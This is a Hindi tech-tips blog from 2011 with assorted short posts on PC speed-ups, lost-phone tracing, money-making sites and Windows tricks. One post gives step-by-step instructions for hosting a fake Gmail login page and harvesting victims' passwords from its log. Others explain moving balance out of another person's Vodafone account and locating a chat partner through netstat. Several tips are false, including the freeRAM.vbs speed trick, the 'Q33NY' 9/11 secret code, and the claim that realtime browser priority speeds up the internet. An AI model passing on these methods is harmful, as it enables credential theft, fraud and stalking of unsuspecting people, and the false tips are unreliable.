एक बेहतरीन तरीके से अपने कंप्यूटर को बनाए सुपर फास्ट

Thursday 21 July 2011

अक्सर आपने देखा होगा जब आप अपने कंप्यूटर पर ज्यादा काम करने लगते हो तो आपका कंप्यूटर स्लो चलने लगता अक्सर ये परेशानी रेम की फ्री मेमोरी के कारण होती है आज मैं आपको ऐसा तरीका बता रहा हु जिसे करने के बाद आपको रेम लगाने की जरुरत नहीं पड़ेगी बल्कि एक क्लीक करते ही आपके कंप्यूटर की स्पीड बढ जाएगी ये एक Notepad की ट्रीक है जिसका तरीका मैं निचे बता रहा हु
सबसे पहले Notepad को खोले और उसमे ये FREEMEM=SPACE(640000) लिख कर freeRAM.vbs में सेव कर दे अब कभी भी आपका कंप्यूटर स्लो हो तो इस फाइल को डबल क्लीक करके चालू कर दे आपका कंप्यूटर सुपर फास्ट हो जायेगा अगर यकीन न हो तो कर के देख लीजिए अगर आप Notepad की बनी बनाई फाइल डाउनलोड करना चाहते है तो यहाँ क्लीक कर के वो फाइल डाउनलोड कर ले

अब वायरस क्या उसका बाप भी रहेगा आपके कंप्यूटर से दूर

Thursday 16 June 2011




अगर आप साइबर कैफे चलाते है तो अक्सर आपके कम्पयुटर मे एन्टी वायरस डला होने के बाद भी वायरस आ जाता है और फिर आपको अपना कम्पयुटर फोरमेट करना पड़ता है आज मै आपके लिए लाया हु वो सोफ्टवेयर जिसे कम्पयुटर मे डालने के बाद ना तो कोई वायरस आयेगा और ना ही कभी आपको अपना कम्पयुटर फोरमेट करना पडेगा ये सोफ्टवेयर आप उसी कम्पयुटर मे डालना जिसे बस नेट चलाने के लिए इस्तेमाल करते हो क्योकि ये सोफ्टवेयर डालने के बाद आपके कम्पयुटर मे कोई फाइल सेव नही होगी अगर आप कोई फाइल सेव करते हो तो वो बस तब तक ही वो आपके कम्पयुटर मे रहेगी जब तक आपका कम्पयुटर खुला है जैसे ही आप अपना कम्पयुटर बंद करेंगे वो फाइल अपने आप डिलिट हो जायेंगी चाहे वो कोई सी भी फाइल हो अगर एक बार ये सोफ्टवेयर आपके कम्पयुटर मे डल गया तो कोई इसे हटा भी नही सकता इस सोफ्टवेयर को बंद करने के लिए आपको Shift+Ctrl+Alt+F6  दबाना है उसके बाद Ok करे फिर Boot Thawed  को स्लेक्ट करने के बादApply and Reboot  को क्लिक करें इसके बाद आपका कम्पयुटर बंद होने के बाद दुबारा खुलने पर वो सोफ्टवेयर डिसेबल हो जायेगा ये सोफ्टवेयर मात्र 5MB के करीब है 


अगर आपको कोई परेशानी आये तो आप मुझसे समपर्क करे
इस सोफ्टवेयर का डाउनलोड लिंक मेने हटा दिया है अगर किसी को चाहिए तो मुझे मेल करे जिसमे आपका नाम पता और मोबाइल नंबर होना चाहिए 
सोफ्टवेयर डाडनलोड करने के लिए यहॉ क्लिक करें

खोए हुवे मोबाइल का पता लगाने का तरीका

अगर आपका मोबाइल फ़ोन खो गया है तो आज मैं आपको ऐसा तरीका बताता हू जिससे आप अपने खोए हुवे मोबाइल का पता कर सकते हो पर इसके लिए आपको अपने खोए हुवे मोबाइल का IMEI नंबर पता होना चाहिए


क्या है ये IMEI नम्बर? IMEI नम्बर का फुल फॉर्म होता है-(International Mobile Equipment Identity) जो पन्द्रह या सत्रह अंक का एक कोड होता है जिसे हम अधिकाँश मोबाईल में *#06# दबा कर देख पाते हैं.ये किसी मोबाइल का नेटवर्क पर एक यूनिक पहचान देता है.और यही पहचान अब चोरी की गयी मोबाइल को पकड़ने में मदद करती है.एडवांस टूल्स का प्रयोग कर ये पता किया जा सकता है कि किसी खास IMEI नम्बर के मोबाईल में किस समय कौन से नेटवर्क का कौन सा सिम प्रयोग में लाया गया है.सिम नम्बर से मोबाइल नम्बर और मोबाइल नम्बर से उसके धारक का पता चलता है.(https://www.numberingplans.com/?page=analysis⊂=imeinr) पर लॉगिन कर IMEI नम्बर से किसी मोबाइल के डिटेल्स का पता किया जा सकता है
आप इस साईट पर भी जाकर अपने खोए हुवे मोबाइल की जानकारी प्राप्त कर सकते हो

नेट से पैसे कमाए


दोस्तों क्या आपका भी नेट से पैसे कमाने का मन करता है अगर आप भी नेट से पैसे कमाना चाहते है तो ये पोस्ट आप ही के लिए है आज मैं आपको दो ऍसी साईट बता रहा हू जिससे आप पैसे कमा सकते है
पहली साईट ये है ये एक ऍसी साईट है जिस पर रजिस्टर करने के बाद आपको तुरंत ही 99 रुपये मिल जाता है रजिस्टर होने के बाद बस आपको रोज मेल पढनी होगी मेल पढने के आपको पैसे मिलते है तो देर किस बात की अभी रजिस्टर करे

और दूसरी साईट ये है जिस पर रजिस्टर करने के बाद आपको बस कुछ एड देखने है गेम खलने है ऐसा करने से रोज आपके एकाउंट में पैसे जमा होते रहते है और आप इस साईट से SMS भी कर सकते है आप जितने ज्यादा से ज्यादा SMS करोगे उतने पैसे आते जायेंगे तो देर किस बात की अभी रजिस्टर करे और पैसे कमाए

कंप्यूटर को फास्ट बनाने का एक और तरीका


अक्सर कंप्यूटर पर काम करते करते कुछ टेम्प्रेली फाइल आपके कंप्यूटर में जमा होती रहती है जिससे आपका कंप्यूटर स्लो चलने लगता है वेसे तो आप टेम्प फोल्डर खोल कर वो फाइल डिलीट कर सकते हो लेकिन कंप्यूटर पर काम करते करते हम उन फाइल को डिलीट करना भूल जाते है लेकिन आज मैं आपको ऐसा तरीका बताता हु जिसे करने के बाद आपको टेम्प फाइल डिलीट करने की जरुरत नहीं पड़ेगी वो अपने आप ही डिलीट हो जाया करेगी इसके लिए आपको RUN में जाकर GPEDIT.MSC टाइप करना होगा उसके बाद
Computer Configuration => Administrative Templates => Windows Components => Terminal Services => Temporary Folders.

जेसा निचे चित्र में दिखाया गया है


यहाँ आपको "Do not delete temp files on exit" लिखा दिखाई देगा इस पर डबल क्लीक करे और DISABLED पर क्लीक करके Apply कर दे जेसा निचे चित्र में दिखाया गया है 

ऐसा करने के बाद आपको कभी भी अपने कंप्यूटर की टेम्प्रेली फाइल हटाने की जरूरत नहीं पड़ेगी वो अपने आप ही हट जाया करेगी और आपका कंप्यूटर स्लो नहीं होगा

पैसा ट्रान्सफर


अगर आप वोडाफोन का इस्तेमाल करते है तो सावधान हो जाइए क्योकि अब आपके
मेन एकाउन्ट से पैसा ट्रान्सफर कर सकते है इस लिए अपना मोबाइल किसी
अजनवी को मत दिजिए क्योकि पैसा ट्रान्सफर करना बहुत आसान है
 किसी के
मोबाइल से पैसा ट्रान्सफर करने के लिए बस आप उसका एकाउन्ट चेक किजिए अगर
उसके एकाउन्ट मे कम से कम 10 का बैलेन्स होना चाहिए ट्रान्सफर विधि उसके
मोबाइल मे डायल किजिए *121*A/C,10,20,30*MOBILE NUMBER# OK कर दिजिए ऐसा
किसी के साथ मत करना केवल जानकारी के लिए बता रहा हुँ

World Trade Center Attacking secret code



जानिए ओसामा बिन लादेन का mision 9/11 सेक्रेटे कोड:-


*जिस जहाज़ से World Trade Center पे निशाना बनाया गया थाउसका flight नंबर था Q33NY

अब जानिए इस Q33NY का राज़

सबसे पहले notepad ओपन करे
फिर टाइप करे Q33N बड़े अख्शारो में
और इस के फॉण्ट साइज़ को बढाकर 72 करे और फॉण्ट को Wingdingsऔर ओके करे

आप एक फोटो स्क्रीन में देखेंगे

यही था ओसामा का सेक्रेटे कोड
 ......................

सीडी रोम ड्राइव के कान्टेक्स्ट मीनू में इंसर्ट आप्शन जोड़ें

विंडोज में सीडी रोम को खोलने के लिये सीडी/डीवीडी रोम के कांटेक्स्ट मीनू में इजेक्ट आप्शन होता है. आइये देखें कि उसमें इंसर्ट आप्शन कैसे जोड़ें. ये आप्शन सीडी रोम को अंदर डाल देगा.
सबसे पहले cdeject.zip फ़ाइल को tinyurl.com/38xklh से डाउनलोड करें. इसमे एक dll फ़ाइल होगी. इस फ़ाइल को c:\windows\system32 पर कापी कर दें.
अब नोटपैड खोलें और उसमे ये कापी पेस्ट कर दें:

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{02A07E80-EFA2-11D4-8306-A7EBD4C50C7C}]
@="CDEject Context Menu Shell Extension"
[HKEY_CLASSES_ROOT\CLSID\{02A07E80-EFA2-11D4-8306-A7EBD4C50C7C}\InprocServer32]
@="C:\\WINDOWS\\system32\\cdeject.dll"
"ThreadingModel"="Apartment"
[HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\{02a07e80-efa2-11d4-8306-a7ebd4c50c7c}]
@="{02a07e80-efa2-11d4-8306-a7ebd4c50c7c}"

इस फ़ाइल को किसी भी नाम से सेव कर दें. पर ध्यान रखें कि फ़ाइल का एक्स्टॆंशन .reg ही हो.
अब इस फ़ाइल में डबल क्लिक करके इसे रन करायें. इससे ये आपसे एक परमीशन मांगेगा. ओके में क्लिक करें.
और हो गया.

अब आपको अपने सी डी रोम के कांटेक्स्ट मीनू में इंसर्ट आप्शन मिलेगा.
image
यह जानकारी अंग्रेजी में यहां उपलब्ध है: http://www.thinkdigit.com/forum/showthread.php?t=35982

अपने कीबोर्ड और माउस को लाक करे



अपना कंप्यूटर छोड़ कर बार बार जाना पड़ता है और आप नही चाहते के कोई पीछे आपका कंप्यूटर इस्तेमाल करे तो अपने कीबोर्ड और माउस को लाक कीजिये और पासवर्ड से सुरक्षित करिए इस मुफ्त 754 KB के टूल से ।




डाउनलोड करने यहाँ क्लिक करें ।



GMAIL Hacking

नोटये सिर्फ़ जानकारी के लिए बता रहा हु इसका इस्तमाल ग़लत काम के लिए  करे idbहैक करना एक cyber crime है इसे अंग्रेजी में भी समझ ले ....

Using a phisher to capture login credentials from users unsuspectedly will give you jail time The owner/author/distrutor of this pack is notresponsible for anything you do with this phisher and everything is totally your own fault.


सबसे पहले इस फाइल को डाउनलोड करे
इस के अन्दर तीन फाइल है
1.gmail
2.mail
3.log
यह एक zip file है इसे डाउनलोड कर ने के बाद राईट click कर के extract कर ले।
अब कोई भी वेब होस्टिंग वाले site पे जा के रजिस्टर कर के एक अकाउंट बना ले
जैसे:-

ईमेल वेरिफिकेशन के बाद अब इस पे आप अपना अकाउंट से लोगिन करे और फाइल मेनेजर पे click करे


और ऊपर तीनो फाइल है उसे वेब होस्टिंग वाले site में अपलोड कर दे

अब gmail.html नाम वाले फाइल क्लीक करे। ये एक दम gmail पेज की तरह ही दिखे गा ये लिंक किसी को भी दे और जैसे ही इस पेज पे लोगिन करे गा आप को पासवर्ड मालूम हो जाएगा


password janne के लिए log वाले फाइल पे click करे उसपे आपको user name,password मालूम हो जाएगा जिसने आपके fake gmail page पे लोगिन किया होगा

Internet स्पिड बढाएं, जबर्जस्त तरीका, मैने नया खोज किया

क्या आपका नेट स्लो है या तेज भी चलता है तो भी हर कोई चाहता है कि वो अपना नेट स्पिड औरज्यादा बढाए।
Warning(खतरा): क्रुप्या पूरा पढें अन्यथा हानी के साथ भूगतान भर्ना पड सकता है, हा...हा....ही...ई
ईसमे आपको कोई साफ्टवेयर कि जरूरत नही है

यह मैने खूद एक्सपेरीमेंट कर के ईसका खोज किया है।
किस ब्राउजर पर काम करेगा?
यह नेट स्पिड बढाने का तरीका सभी ब्राऊजरों पर काम करेगा चाहे वो Internet Explorer हो या Firefox और चाहे कोई भी हो|
कैसे करें?
मेरा काम है बताना, कोई भी हानी का जिम्मेदारी आपकी रहेगी और ईसमे मेरा कोई दोश नही होगा :)

पहले उस ब्राऊजर को खोलें जिसका स्पिड आप बढाना चाहते हैं जैसे Internet Explorer या Firefox

अब Desktop पर जा कर Alt+Ctlr+Delete दबाएं और टास्क मैनेजर खूल जाएगा और अब
Processes पर दबाएं और जो भी ब्राउजर उपयोग कर रहे हैं लिस्ट मे देखें और मिल जाने के बाद उसपर Right Click करें और
"
Set Priority" >> "Real Time" पर क्लिक कर दें और बाक्स खूलेगा और वार्नींग देगा उसे पढने के बाद अगर आप चाहते हैं अपना नेट स्पिड बढाना तो "OK" दबाएं!
यह स्क्रिन साट देखें















मै ये पहले से कर चूका हूं ईसीलिये "setprioriy" पहले से ही रियलटाईम पर सेट है

ये एक्सपेरिमेंट मैने Windows XP मे किया है और फायर्फोक्स ब्राउजर पर, ध्यान रहे सिर्फ ब्राउजरों पर हि यह करें और अपना कंप्युटर स्पिड बढाने के लिये किसी सिस्टम फाईल पर ना कर दें :)))
एक और बात जब आप कंप्युटर बंद कर देंगे और फिर कभी चालू करेंगे तो आपको यह कार्य फिर से करना पडेगा क्यो कि कंप्युटर बंद होने के बाद दोबारा चालू करने पर यह सेटिंग फिर से Default पर सेट हो जाता है|
ईससे नेट का स्पिड कैसे बढ सकता है?
छोटे शब्दो मे बताता हूं: ब्राउजर किसी भी साईट को दिखाने के लिये पहले उसे पूरी तरह लोड करता है पर कम शक्ति वाले कंप्युटर वेबपेज को लोड करने के बाद भी 1 - 2 मिनट ज्यादा लगा देते हैं जिससे वेबसईट खूलने मे देरी लग जाती है पर यह ट्रिक अपनाने पर आपके ब्राउजर को Special शक्ति दि जाती है जिस्से वह किसी भी साईट को जल्दि से दिखा देता है| जाहें आधा पेज हि क्यों ना लोड हूवा हो|
अगर आपके नेट के स्पिड मे बदलाव आया है तो जरूर बताएं

बिना माउस के माउस पोइन्टर कैसे चलाएं

अगर आपका माउस अचानक काम करना बन्द कर दे या आपको बिना माउस के माउस पाइन्टर को चलाना है तो आप क्या करेंगे
इस स्थिति में आप बिना माउस के सहारे अपने कीबोर्ड के द्वारा माउस पाइन्टर को चला सकते हैं
इसके लिये आपको MouseKeys को आन करना होगा
MouseKeys को आन करने के लिये 
बांया Alt + बांया Shift + Number Lock+Ok दबायें

अब माउस पाइन्टर को चलाने के लिये7 8 9
4 6
1 2 3
का उपयोग करें क्लिक करने के लिये 5 दबाये

लैपटॉप, कीमत सिर्फ 2,200 रु

इस महीने के आखिर में ऐसे 10,000 लैपटॉप आईआईटी राजस्थान को दिए जाएंगे। अगले चार महीनों में ऐसे 90,000 और लैपटॉप शिक्षण संस्थाओं में भेजे जाएंगे। इनकी कीमत होगी महज 2,200 रुपए।को शिक्षा मंत्रियों की बैठक में इस बात की घोषणा की गई थी।मानव संसाधन मंत्रालय के एक अधिकारी ने बताया कि एक लाख लैपटॉप तैयार हो चुके हैं। इसमें से हर राज्य को तीन तीन हजार लैप टॉप दिए जाएंगे। केन्द्र सरकार इन पर 50 प्रतिशत की सब्सिडी दे रही है।
इसका मतलब यह हुआ कि हर छात्र को इसके लिए सिर्फ 1100 रुपए देने होंगे।पहले यह तय हुआ था कि ये लैपटॉप सिर्फ 1500 रुपए में दिए जाएंगे लेकिन महंगाई बढ़ने से इनकी कीमतें बढ़कर 2200 रुपए हो गईं। सरकारी सूत्रों ने बताया कि अगर ज्यादा बिक्री हुई तो दाम गिराकर फिर से 1500 रुपए कर दिया जाएगा।इस लैपट़ाप का स्क्रीन सात इंच का है। इसमें दो यूएसबी पोर्ट हैं और इसकी बैटरी तीन घंटे चलती है और इसका मेमरी सपोर्ट 16 जीबी का है। 

इन्टरनेट पर चैटिंग कर रहे इन्सान का लोकेशन जानिए |

जैसा हर जगह कहा जाता है की चैटिंग में आईपी एड्ड्रेस नहीं पता किया जा सकता क्यूंकि सूचना कई सर्वर से हो के जाती है |
बात तो ये सही है ,लेकिन फिर भी ट्रेसिंग संभव है और उसका तरीका है फाइल ट्रान्सफर |
यदि आप चैटिंग करते हुए सामने वाले को किसी तरह से कोई फाइल भेजने या स्वीकार करने के लिए मना ले तो आप उसके आईपी एड्ड्रेस को ट्रेश कर के उसका लोकेसन जन सकते है |
चुकी फाइल ट्रान्सफर के समय दोनों कंप्यूटर में सीधा संपर्क होता है,इसलिए उस समय आप उसके आईपी एड्ड्रेस को ट्रेश कर सकते हैं | 
फाइल चाहे कोई फोटो हो, कोई टेक्स्ट फाइल हो या कुछ भी , बस ध्यान रखें कि फाइल ट्रान्सफर के समय ही आप ऐसा कर सकते हैं |
तो आईये देखे की इस काम को कईसे किया जा सकता है |
फाइल ट्रान्सफर के समय कमांड प्रोम्प्ट में टाइप करें " netstat " | 
अब जो सूचि आप को दिखे गी वो कुछ इस प्रकार कि होगी...........



Proto Local Address Foreign Address State
TCP kick:1244 msgr-ns39.msgr.yahoomail.com:1985 ESTABLISHED
TCP kick:1257 msgr-sb46.msgr.yahoomail.com:1985 ESTABLISHED


यहाँ yahoomail आने का अर्थ है कि मैंने याहू मेसेंजर का प्रयोग किया था , यदि आपgtalk, या किसी और मेसेंजेर का प्रयोग करेंगे तो उसका विवरण होगा |
अब इस लिस्ट कि पहली लाइन आपके चैटिंग अप्लिकेशन का होस्ट सर्वर है | 
और दूसरी लाइन आपके द्वारा प्रयोग किये जा रहे रूम को दर्शाता है |
इसी लिस्ट में और नीचे जाने पर आपको कुछ इस प्रकार की लाइन मिलेगी :
"host82-7-106-237.ppp.***.****.com" या “256..65.72.8”
अब आपको इस सूचि से प्राप्त संख्या को आईपी खोजने वाली किसी भी साईट पर डालना है और सामने बैठे इन्सान की लोकेशन आपके सामने होगी |
लेकिन याद रखियेगा ये काम सिर्फ डाटा ट्रांसफर के वक़्त ही किया जा सकता है |